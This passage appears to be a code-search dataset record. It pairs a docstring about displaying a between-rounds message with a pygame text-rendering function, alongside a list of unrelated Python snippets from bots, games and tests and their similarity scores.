context.bot_data[request_id]\n\n if response_code == \"caution_ok\":\n # They're in good health, let's go\n\n # send a location message, if this info is available in the request\n if \"latitude\" in request_details:\n self.updater.bot.send_location(\n chat_id, request_details[\"latitude\"], request_details[\"longitude\"]\n )\n\n # then send the rest of the details as text\n message = c.MSG_FULL_DETAILS % request_details\n\n if \"remarks\" in request_details:\n message += \"\\n\" + c.MSG_OTHER_REMARKS\n for remark in request_details[\"remarks\"]:\n message += \"- %s\\n\" % remark\n\n if \"hasDisabilities\" in request_details:\n message += \"\\n%s\\n\" % (c.MSG_DISABILITY % request_details)\n\n message += \"\\n\" + c.MSG_LET_ME_KNOW\n self.updater.bot.send_message(\n chat_id=chat_id,\n text=message,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(k.handling_choices),\n )\n\n else: # caution_cancel\n # eventually they chose not to handle this request\n # TODO ask them why, maybe they're sick and they need help? 
Discuss whether this is relevant\n self.send_message(chat_id, c.MSG_NO_WORRIES_LATER)\n context.user_data[\"reviewed_request\"] = None\n context.user_data[\"state\"] = c.State.AVAILABLE\n self.backend.update_request_status(request_id, \"CANCELLED\")", "def save(self, *args, **kwargs):\n if not self.require_confirm_email:\n User.objects.filter(is_active=False, deactivation_reason=\"pending\").update(\n is_active=True, deactivation_reason=None\n )\n if not self.invite_question_text:\n self.invite_question_text = \"What is your favourite book?\"\n super().save(*args, **kwargs)", "def execute_civ_discard(index_to_discard: int, log: bool = True) -> None:\n game_state.remove_single_tiles_from_player(\n [index_to_discard],\n game_state.get_auction_winning_player(),\n log=log,\n )\n game_state.decrement_num_civs_to_discard()\n mark_player_passed_if_no_disasters(game_state.get_auction_winning_player())\n\n # if no disasters to be resolved, resume play from after\n # auction starter\n if not game_state.disasters_must_be_resolved():\n game_state.set_current_player(game_state.get_auction_start_player())\n game_state.advance_current_player()", "def test_reactivation_for_unregistered_user(self, email_user):\r\n response_data = self.reactivation_email(self.unregisteredUser)\r\n\r\n self.assertFalse(response_data['success'])", "def test_discard_action(self):\n self.plr.test_input = [\"discard silver\", \"finish selecting\"]\n self.plr.play_card(self.card)\n self.assertEqual(self.plr.piles[Piles.HAND].size(), 2)\n self.assertEqual(self.plr.actions.get(), 2)\n self.assertEqual(self.plr.buys.get(), 1)\n self.assertNotIn(\"Silver\", self.plr.piles[Piles.HAND])", "async def team_unignore(self, ctx: commands.Context):\n await self.config.user(ctx.author).do_not_message.set(False)\n await ctx.send('Okay, I\\'ll include you back in team-wide DMs.')" ]
[ "0.6619172", "0.65421534", "0.63608795", "0.6252194", "0.62353194", "0.6222551", "0.61789745", "0.6149395", "0.61379594", "0.6117161", "0.6086858", "0.6077924", "0.6073165", "0.60582376", "0.60207057", "0.60002977", "0.59929824", "0.5937757", "0.593176", "0.59203535", "0.5888317", "0.58854973", "0.5876241", "0.58461815", "0.5845953", "0.58290064", "0.5824021", "0.5810428", "0.5774078", "0.5760513", "0.5730184", "0.5727028", "0.5719213", "0.5712494", "0.569602", "0.56713146", "0.56707263", "0.56659585", "0.56418097", "0.56418097", "0.56418097", "0.56418097", "0.5628323", "0.5627331", "0.56135094", "0.5564286", "0.5553009", "0.55511534", "0.5538483", "0.55264467", "0.55264467", "0.5493888", "0.54898596", "0.54897773", "0.54896", "0.54874194", "0.5454041", "0.5440779", "0.54360706", "0.5430588", "0.542803", "0.5422573", "0.5410228", "0.53916657", "0.53900766", "0.53846043", "0.5377666", "0.53740996", "0.53653234", "0.53620553", "0.5361535", "0.5348276", "0.5344653", "0.5344445", "0.5343346", "0.5341422", "0.5331381", "0.5326362", "0.5326036", "0.53223634", "0.53167146", "0.53077775", "0.5305748", "0.5305279", "0.5304685", "0.5291263", "0.5289273", "0.52815866", "0.52719086", "0.5262374", "0.52619606", "0.5261655", "0.5256375", "0.525084", "0.5249647", "0.5233938", "0.5233146", "0.5233142", "0.52320886", "0.52315813" ]
0.72036105
0
Print a message where cards are usually displayed, until the Ready button is clicked for the next round.
def mesgBetweenRounds(self, message): font = UIC.Medium_Text y_offset = (UIC.Disp_Height * (1 - (UIC.Hand_Row_Fraction * 0.8))) for message_string in message: text_surface = font.render(message_string, True, UIC.Black) text_rect = text_surface.get_rect() text_rect.center = ((UIC.Disp_Width * 0.5), y_offset) y_offset = y_offset + UIC.Medium_Text_Feed self.display.blit(text_surface, text_rect)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def progress_game(self):\r\n\r\n if self.actions == len(self.players):\r\n # Reveal the 3 first cards\r\n output_text = \"Dealing the flop...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.flop()\r\n\r\n if self.actions == 2 * len(self.players):\r\n # Reveal a 4th card\r\n output_text = \"Dealing the turn...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.turn()\r\n\r\n if self.actions == 3 * len(self.players):\r\n # Reveal a 5th card\r\n output_text = \"Dealing the river...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.river()\r\n\r\n if self.actions == 4 * len(self.players):\r\n self.showdown()", "def display(self):\n\t\tprint('The button in the window was clicked!')", "def printStartMsg(self):\n\n print(\"\\nSTARING THE GAME\")\n print(\"HAVE FUN!\\n\")", "def display_message():", "def printWaiting(self):\n\t\tfor wait in self.w:\n\t\t\tw_print=\"\"\n\t\t\tfor c in wait:\n\t\t\t\tif c:\n\t\t\t\t\tw_print += str(c[1])\n\t\t\t\telse:\n\t\t\t\t\tw_print += 'NO'\n\t\t\t\tw_print += \" \"\n\t\t\tprint w_print", "def show_results(self):\r\n\r\n if self.player_cards > self.computer_cards: # player wins\r\n print('\\nCongratulations!!')\r\n print('You WIN by {0} / {1}'.format(self.player_cards, self.computer_cards))\r\n elif self.player_cards < self.computer_cards: # computer wins\r\n print('\\nToo bad!!')\r\n print('You LOST by {0} / {1}'.format(self.player_cards, self.computer_cards))\r\n else: # tied\r\n print('You TIED by {0} / {1}'.format(self.player_cards, self.computer_cards))", "def _complete(self):\n self._last = self._touch\n if self._game.getWall().getBricks() == []:\n m = 'Congratulations!\\nYou Won\\n\\nClick to play again'\n f = 30\n h = GAME_HEIGHT*(2.0/3.0)\n self._playAgain()\n elif self._game.getPlayerLives() == 0:\n m = 'Game Over\\nClick to try again'\n f = 30\n h = GAME_HEIGHT*(2.0/3.0)-10\n self._playAgain()\n self._countdownTime = 0\n self._countdownMessage = GLabel(text='3', font_size=40,x=GAME_WIDTH / 2.0,\n y=GAME_HEIGHT*(2.0/3.0), halign='center',\n valign='middle', linecolor=colormodel.WHITE)\n self._pausedMessage = GLabel(text=m,font_size=f,x=GAME_WIDTH / 2.0,\n y=h, halign='center', valign='middle',\n linecolor=colormodel.WHITE)", "def welcome_screen(self):\n print()\n print('P*O*K*E*R')\n print('Welcome to a 5-card poker game,\\n' +\n 'The goal is the get a better hand than the AI.')\n print('To do this you get one chance to swap cards' +\n 'that are in your hand')\n print('You swap like this:\\n' +\n '1. Choose how many cards you want to swap\\n' +\n '2. Write the number of the card(s) you want to swap, like this:\\n' +\n 'If you want to swap card 2, type in 2.\\n' +\n 'If you want to swap card 1 and 4, type 1,4')\n print('Next both your and AI hand is shown,\\n' +\n 'and the winner is declared.')\n print('For information on what hand beats what, \\n' +\n 'and what happens when both players have an equally good hand,\\n' +\n 'please follow the link below:\\n' +\n 'https://github.com/oljung/portfolio-project-three\\n' +\n 'NOTE! Ctrl + c will terminate the app, use right click to copy')\n message = 'Would you like to play a round? 
Y(es) or N(o): '\n answer = InputHandler.input_bool(message)\n if answer:\n self.run_game()", "def print_status(self):\r\n\t\tif VERBOSE:\r\n\r\n\t\t\tprint( 'Player : ')\r\n\t\t\tfor h in self.hands:\r\n\t\t\t\tprint('\\t' + str(h))\r\n\t\t\tprint( 'Dealer:\\n\\t' + str(self.dealer))\r\n\t\t\tprint( '-----------------------')", "def showMessage(self):", "def present_status(self):\n output = ''\n if self.stats['hand']:\n output += 'Ready: \\n'\n for card in sorted(self.stats['hand'], key=itemgetter('name')):\n output += card_format(card) + '\\n'\n output += '\\n'\n if self.stats['active']:\n output += 'Active: \\n'\n for card in self.stats['active']:\n output += card_format(card) + '\\n'\n if self.stats['discard']:\n output += '\\nSpent: \\n'\n for card in self.stats['discard']:\n output += card_format(card) + '\\n'\n output += '\\n'\n output += 'Spells: \\n'\n for power in self.stats['powers']:\n output += '%s x %d\\n' % (power, self.stats['powers'][power])\n if self.stats['opponent']:\n output += '\\nCurrent Activity:\\n'\n output += '%s' % (card_format(self.stats['opponent']))\n header_print('Status')\n print(output)", "def print_next_choices(self) -> None:\n print(f'Now you are in Room #{self._id}')\n print('You have the following choices:')\n for option in range(1, len(self._choices)):\n print(f'Option {option}:')\n self._choices[option].print_choice_msg()", "def build_deck_screen_end_screen_warning_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n if button_status.build_deck_screen_end_screen_warning_button_display == 'character card':\n button = Button('Missing A','' ,(122,33,38),1050, 0, 150, 30,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('Character Card!','' ,(122,33,38),1050, 30, 150, 30,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.build_deck_screen_end_screen_warning_button_display == '4 copy each':\n button = Button('No More Than 4','' ,(122,33,38),1050, 0, 150, 30,font_size = 15)\n button.update()\n button.draw(screen)\n\n button = Button('Copies For Each Card!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)", "def display(self):\n for i in range(0, len(self.__drawn)):\n if self.__drawn[i]:\n print(str(i+1) + \". You drew a short straw!\")\n else:\n print(str(i+1) + \". You're okay.\")", "def show_msg(self):\n if self.result and self.success_msg:\n print color_str('g', '\\n'.join(self.success_msg))\n elif self.result == False and self.fail_msg:\n print color_str('r', '\\n'.join(self.fail_msg))\n if self.stat_msg:\n print color_str('b', '\\n'.join(self.stat_msg))", "def print_contents(self):\n try:\n # We only wait for 0.001 seconds.\n self.print_all_contents(indef_wait=False)\n except NotYourTurnError:\n # It's not our turn, so try again the next time this function is called.\n pass", "def print_menu():\r\n print(\"==============================================\")\r\n print(\"What do you want to do now? 
\")\r\n print(\"==============================================\")\r\n print(\"Available options:\")\r\n i = 1\r\n for a in available_actions:\r\n if current_state in a[\"valid_states\"]:\r\n # Only hint about the action if the current state allows it\r\n print(\" %i) %s\" % (i, a[\"description\"]))\r\n i += 1\r\n print()", "def show_game_mission():\n print_bold(\"任务:\")\n print(\"\\t选择李维可以休息的小屋...\")\n print_bold(\"TIP:\")\n print(\"保持警惕,周围有敌人!\")\n print_dotted_line()", "def drawDescription(self):\n print(\"\\nPress the following keys to run the features of the GoPiGo3.\")\n print(\"To move the motors, make sure you have a fresh set of batteries powering the GoPiGo3.\\n\")", "def showdown(self):\r\n\r\n poker_hands = []\r\n message = \"\"\r\n for player in self.players:\r\n poker_hands.append(player.hand.best_poker_hand(self.community_cards.cards))\r\n\r\n # Reveal all cards when the round is over\r\n player.reveal_cards()\r\n\r\n if poker_hands[0].type > poker_hands[1].type:\r\n message = \"Player {} won! \\nPoker hand >{}< won against >{}<\".format(\r\n self.players[0].name, str(poker_hands[0].type), str(poker_hands[1].type))\r\n self.players[0].credits += self.pot\r\n\r\n if poker_hands[0].type < poker_hands[1].type:\r\n message = \"Player {} won! \\nPoker hand >{}< won against >{}<\".format(\r\n self.players[1].name, str(poker_hands[1].type), str(poker_hands[0].type))\r\n self.players[1].credits += self.pot\r\n\r\n if poker_hands[0].type == poker_hands[1].type:\r\n if poker_hands[0].highest_values > poker_hands[1].highest_values:\r\n message = \"Player {} won! \\nHighest value >{}< won against >{}<\".format(\r\n self.players[0].name, str(poker_hands[0].highest_values), str(poker_hands[1].highest_values))\r\n self.players[0].credits += self.pot\r\n\r\n elif poker_hands[0].highest_values < poker_hands[1].highest_values:\r\n message = \"Player {} won! \\nHighest value >{}< won against >{}<\".format(\r\n self.players[1].name, str(poker_hands[1].highest_values), str(poker_hands[0].highest_values))\r\n self.players[1].credits += self.pot\r\n\r\n elif poker_hands[0].highest_values == poker_hands[1].highest_values:\r\n message = \"It is a draw! Both players had >{}< and highest value >{}<\".format(\r\n poker_hands[0].type.name, str(poker_hands[0].highest_values))\r\n\r\n for player in self.players:\r\n player.credits += (self.pot // len(self.players))\r\n else:\r\n self.game_message_warning.emit(\"Incorrect comparison of poker hands\")\r\n\r\n self.new_output.emit(message)\r\n self.game_message.emit(message)\r\n self.new_credits.emit()\r\n self.new_pot.emit()", "def display_starting_message(): # opening message\n starting_message = \"Is your cat plotting to kill you?? \\nLet's find out. \\n(Please note that this is merely a pythonic presentation of an app created by The Oatmeal. \\nI do not claim credit for its brilliance. 
I'm just trying to learn Python.)\"\n print(starting_message)", "def text_output(self):\n print(self.board)\n print()", "def intro_instructions():\n print(\"The board will be updated after each move.\")\n print(\"Watch both the board and the python prompt after each move.\")\n print(\"Player 1 is white and player 2 is orange\")\n print(\"Green boxes are snakes and yellow boxes are ladders.\")\n print(\"If you hit any part of the snake(not just the head), you will slide down to the snakes tail\")\n print(\"If you hit any part of the ladder(not just the bottom), you will climb to the ladder's top\")\n print(\"May the luckiest player win\")", "def next(self):\n print(f\" {colored('[', 'yellow')}{bold(self.progress[self.pos])}{colored(']', 'yellow')} \"\n f\"{bold('Processing, please wait...')}\",\n end=\"\\r\",\n flush=True\n )\n self.increment()", "def print_intro(self):\n \n print('Did you know that birds hold the record for longest animal migrations?')", "def lobby_screen_pick_deck_warning_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n if button_status.lobby_screen_end_screen_warning_button_display == 'deck less than 40 cards':\n button = Button('You need at least 40','' ,(122,33,38),1050, 580, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('cards in your deck!','' ,(122,33,38),1050, 610, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 640, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 642, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.lobby_screen_end_screen_warning_button_display == 'no deck':\n button = Button('Please pick a deck','' ,(122,33,38),1050, 580, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('or build a new one!','' ,(122,33,38),1050, 610, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 640, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 642, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)", "def set_info_text(self):\n if not self.vars[\"enabled\"].get():\n msg = \"{} disabled\".format(self.tabname.title())\n elif self.vars[\"enabled\"].get() and not self.vars[\"ready\"].get():\n msg = \"Waiting for {}...\".format(self.tabname)\n else:\n msg = \"Displaying {}\".format(self.tabname)\n logger.debug(msg)\n self.set_info(msg)", "def display_message():\n\tprint(\"In this chapter we will be learning how to write functions\")", "def prepare_screen_end_screen_warning_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n if button_status.prepare_screen_end_screen_warning_button_display == 'deck less than 40 cards':\n button = Button('You need at least 40','' ,(122,33,38),1050, 0, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('cards in your deck!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.prepare_screen_end_screen_warning_button_display == 'no deck':\n button = Button('Please 
pick a deck','' ,(122,33,38),1050, 0, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('or build a new one!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.prepare_screen_end_screen_warning_button_display == 'no character':\n button = Button('Please pick a character','' ,(122,33,38),1050, 0, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('for your opponent!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.prepare_screen_end_screen_warning_button_display == 'no difficulty':\n button = Button('Please pick a difficulty','' ,(122,33,38),1050, 0, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('for your opponent!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)", "def print(self):\n if self.passed():\n self.print_passed()\n else:\n self.print_failed()", "def _do_outputs(self):\n self._puzzle.display_revealed_puzzle()\n hint = self._puzzle.get_hint()\n self._console.write(hint)\n print(\"\")\n self._jumper.draw_jumper()\n print(\"\")\n\n # These ifs end the game\n if self._puzzle.is_solved():\n self._keep_playing = False\n self._puzzle.display_win_screen()\n \n if self._puzzle.incorrect_guesses >= 4:\n self._keep_playing = False\n self._puzzle.display_loss_screen()", "def display_message():\n\tprint(\"Learnt to write functions, which are named blocks of code that are designed to do one specific job.\")", "def display(self):\n while (True):\n self.print()\n choice = self.get_choice()\n if (choice == len(self.options)):\n break\n else:\n self.options[choice].function()", "def display(self,message):\r\n \r\n print(message)", "def sprint(self):\n self.buttons = []\n self.screen.blit(self.background_image, (0, 0))\n self.create_button((self.width // 2 - 257, self.height // 8 - 85), 501, 200, Colors.BLACK, \"20L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 3 - 81), 501, 200, Colors.BLACK, \"40L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 5 - 86), 501, 200, Colors.BLACK, \"100L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 7 - 85), 501, 200, Colors.BLACK, \"1000L\")\n self.show_buttons()\n self.show_text_in_buttons()\n pygame.display.flip()", "def display_result(self) -> None:\n winner = self.state.winner\n if winner:\n self._display_message(winner + ' wins!')\n else:\n self._display_message('Draw')\n\n self._display_message(\n f'\\n{self.state.player1} has {self.state.player1_score} wins'\n )\n self._display_message(\n f'{self.state.player2} has {self.state.player2_score} wins\\n'\n )", "def on_press(self):\n if self.book.is_completed:\n self.book.mark_required()\n else:\n 
self.book.mark_completed()\n self.set_color()\n self.text = str(self.book)\n self.top_label.set_label_text()\n text = 'You {} \\'{}\\'.{}'.format(\n 'completed' if self.book.is_completed else 'need to read',\n self.book.title,\n (' Great job!' if self.book.is_completed else ' Get started!') if self.book.is_long() else ''\n )\n self.warn_label.set_label_text(text)", "def print_hand(self):\n if self.cheating:\n print(\"You're cheating!\")\n print(\"until you reroll it!\")\n print(\"\"\"\nYou rolled:\na = [ {} ]\nb = [ {} ]\n\nYou are in Stage {}\n \"\"\".format(self.die_a, self.die_b, self.stage))", "def show_quest(self):\n for quest_line in self.qtext:\n print(quest_line)\n time.sleep(1)", "def ready(self):\n self.stdout.write('READY\\n')\n self.stdout.flush()", "def play():\n display_starting_message()\n print(\"\")\n print(\"*\"*10)\n for question_number, question in enumerate(list_of_questions):\n print(question)\n print(\"\")\n for responses in list_of_questions[question]:\n print(responses)\n pick_one = input(\"pick one: \")\n check_murder_sauce(question, pick_one)\n\n murder_sauce_result(murder_sauce)", "def displayDiscarded(self):\n print(\"Discarded :\")\n if len(self.discarded) == 0:\n print(\"*no discard yet*\")\n else:\n for card in self.discarded:\n print(card.toString(), end=\" \")\n print()", "def show_game_mission():\n print_bold(\"Misija:\")\n print(\"\\tOdaberi kućicu u kojoj se Talion može odmoriti ...\")\n print_bold(\"SAVJET:\")\n print(\"PAZI kako biraš jer neprijatelji su blizu!\")\n print_dotted_line()", "def battle_screen_history_bar_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n\n\n for number,text in button_status.battle_screen_history_bar_text_dict.items():\n if int(number) == 1:\n button_text = Button(text,'', (0,0,0),250, 0, 600, 30, font_size = 13, alpha = 100)\n button_text.update()\n button_text.draw(screen)\n else:\n pass\n\n button_details = Button('+','', (0,0,0),850, 0, 100, 30,font_size = 25, alpha = 100)\n button_details.update()\n button_details.draw(screen)\n\n if button_status.battle_screen_history_bar_detail_display == True:\n i = 0\n for number,text in button_status.battle_screen_history_bar_text_dict.items():\n\n if int(number) % 2 == 1 and text != '':\n if text == \"Game Started!\":\n button_odd = Button(text,'', (0,160,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif text == \"Your turn has started\":\n button_odd = Button(text,'', (0,160,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif text == \"Opponent's turn has started\":\n button_odd = Button(text,'', (160,0,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n else:\n button_odd = Button(text,'', (160,160,160),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif int(number) % 2 == 0 and text != '':\n if text == \"Game Started!\":\n button_even = Button(text,'', (0,160,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n elif text == \"Your turn has started\":\n button_even = Button(text,'', (0,160,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n elif text == \"Opponent's turn has started\":\n button_even = Button(text,'', (160,0,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n 
button_even.update()\n button_even.draw(screen)\n i += 1\n else:\n button_even = Button(text,'', (130,130,130),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1", "def event_loop(self):\n if self.message_counter:\n if not self.msg:\n self.showdialog()\n else:\n self.msg.setText(\n \"COMET encounterd {} error(s)\".format(self.message_counter).ljust(\n 70\n )\n )", "def instructions():\n\t\n\tprint \\\n\t\"\"\"\n\tToday we will play the perennial favorite game of...\n\tRock! Paper!! Scissors!!!.\n\tThe objective of the game is to outthink your opponent (in this case me) and defeat.\n\tThe rules are very simple\n\t1. Paper covers the Rock\n\t2. Rock breaks the Scissors\n\t3. Scissors cut the Paper\n\t\n\tChoose your move from the following:\n\t1. Paper (p)\n\t2. Rock (r)\n\t3. Scissors (s)\n\t\n\tAre you ready? Alright then, let's play...\n\t\"\"\"", "def progress(self, msg):\n logging.info(\"UI-Test: \" + msg)\n with step(\"UI test progress: \" + msg):\n pass\n if len(self.state) > 0:\n self.state += \"\\n\"\n self.state += \"UI: \" + msg", "def example(self):\n while self.check_end() == False:\n plt.pause(0.25)\n end = self.update_board(random.choice(self.get_actions()), True)", "def welcome_banner():\n print('\\t*' * 10)\n print('\\t\\tWelcome!')\n print('\\tPut your knowledge to the test with this Ultimate Quiz Questions!')\n print('\\t*' * 10)\n print()", "def game_over(self):\n if self.missed == 5:\n print(\"You Lost! Better Luck Next Time!\")\n else:\n print(\"You Won! Congratulations!\")\n self.print_full_phrase()", "def battle_screen_character_1_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n button_basic_info = Button('Lv: ' + user.character_card.level + ' HP: ' + user.character_card.health + ' Card #: ' + str(len(user.hand_list)),'', (0,0,0),1000, 0, 200, 30, alpha = 100)\n button_basic_info.update()\n button_basic_info.draw(screen)\n\n if ('stage-2-character-action-1' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,132,50,23,alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-character-action-2' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,155,50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-character-action-3' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,178,50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-other-action-' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False\n and 'detail' not in screen_status.battle_screen_action_indicator):\n x = screen_status.battle_screen_action_indicator.replace('stage-2-other-action-','')\n button_action_pointer = Button('>>','',(92,13,78),1000,220+23*(int(x)/10-1),50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)", "def print_status(self, state, auction_round):\n\n if state['bid_winner'] is None:\n self.log('No bidder on this round {}.\\n'.format(auction_round))\n else:\n 
self.log('Player {} won {} on this round {} with bid amount {}.\\n'.format(\n state['bid_winner'], state['bid_item'], auction_round, state['winning_bid']))\n\n self.log('Remaining time:')\n for idx in range(len(self.players)):\n if self.players[idx]['valid']:\n self.log('\\t{} has {} seconds remaining'\n .format(self.players[idx]['name'], self.players[idx]['remain_time']))\n\n self.log('Remaining wealth:')\n for idx in range(len(self.players)):\n if self.players[idx]['valid']:\n self.log('\\t{} has {} dollars remaining'.format(self.players[idx]['name'], self.players[idx]['wealth']))\n\n self.log('------------------------------------\\n')\n\n if state['finished']:\n self.log('Game over\\n{}\\n'.format(state['reason']))", "def card_success(self): \n handles = self.driver.window_handles\n while len(handles) != 3:\n handles = self.driver.window_handles\n self.driver.switch_to_window(handles[2])\n WebDriverWait(self.driver, 20).until(EC.visibility_of_element_located((By.CSS_SELECTOR,'.success'))) \n self.driver.find_element_by_class_name(\"success\").click()\n self.driver.switch_to_window(handles[0])", "def status(s):\n print('\\033[1m{0}\\033[0m'.format(s))\n time.sleep(2)", "def print_intro(self):\n \n print('Did you know mammals tend to have the shortest migration routes because walking takes more energy than flying or swimming?')", "def intro():\n os.system('cls')\n print(\"-------------------------\")\n print(\" MOON PHASE CALENDAR\")\n print(\"-------------------------\")", "def showMessage(self, message):\r\n print message", "def set_display_message(self, title=\"\", speaker=\"\"):\r\n if self.recording:\r\n self.talkInfoString.setText(\"RECORDING\\n\\nTime remaining:\")\r\n else:\r\n self.talkInfoString.setText(\"NEXT TALK\\nTitle: %s\\nSpeaker: %s\\n\\nTime until recording:\" % (title, speaker))", "def __display_login_info(self):\n print(f'\\nYour card has been created\\n'\n f'Your card number:\\n'\n # f'{self.__card_display()}\\n' # uncomment this line and comment out line below for pretty display\n f'{self.card_number}\\n'\n f'Your card PIN:\\n'\n f'{self.__account_pin}\\n', )", "def print_start_game():\n print(HANGMAN_ASCII_ART)\n print(MAX_TRIES)", "def print_choice_msg(self) -> None:\n pass", "def print_board(self):\n \n # How to show empty/p1/p2\n VALS = \".XO\"\n\n print(\"\\n a b c d e f g\")\n print(\" /--+-+-+-+-+-+--\\\\\")\n for r in range(_HEIGHT - 1, -1, -1):\n s = \"%s |\" % r\n for c in range(_WIDTH):\n # Print mark next to most recent move\n mark = \">\" if self.last_play_rc == (r, c) else \" \"\n s += mark + VALS[self.board[r * 7 + c]]\n print(s + \" |\")\n print(\" \\\\--+-+-+-+-+-+--/\")\n print(\" a b c d e f g\\n\")", "def print_confirmation(action):\n\tprint(Fore.YELLOW + Style.BRIGHT + action + Style.RESET_ALL + \"\\n\")", "def success(msg):\n click.secho(msg, fg='green')", "def print_intro(player, board):\n print(f'\\n+++++++++++++++++++++++ DOCTOR WHO ADVENTURE: THE MISSING TARDIS +++++++++++++++++++++++\\n')\n print(f'\"Doctor, this doesn\\'t feel right,\" {player[\"Name\"][0]} said hesitantly, \"Are'\n f' you sure we should be here? \\nThe TARIDS really didn\\'t want to land just now.\"'\n f' \"The old girl is just being temperamental, {player[\"Name\"][0]}. \\nDon\\'t worry,\"'\n f' the DOCTOR said nonchalantly as he fiddled with the monitors at'\n f' the console. \\n\"The note sent to the psychic paper was from an old friend. 
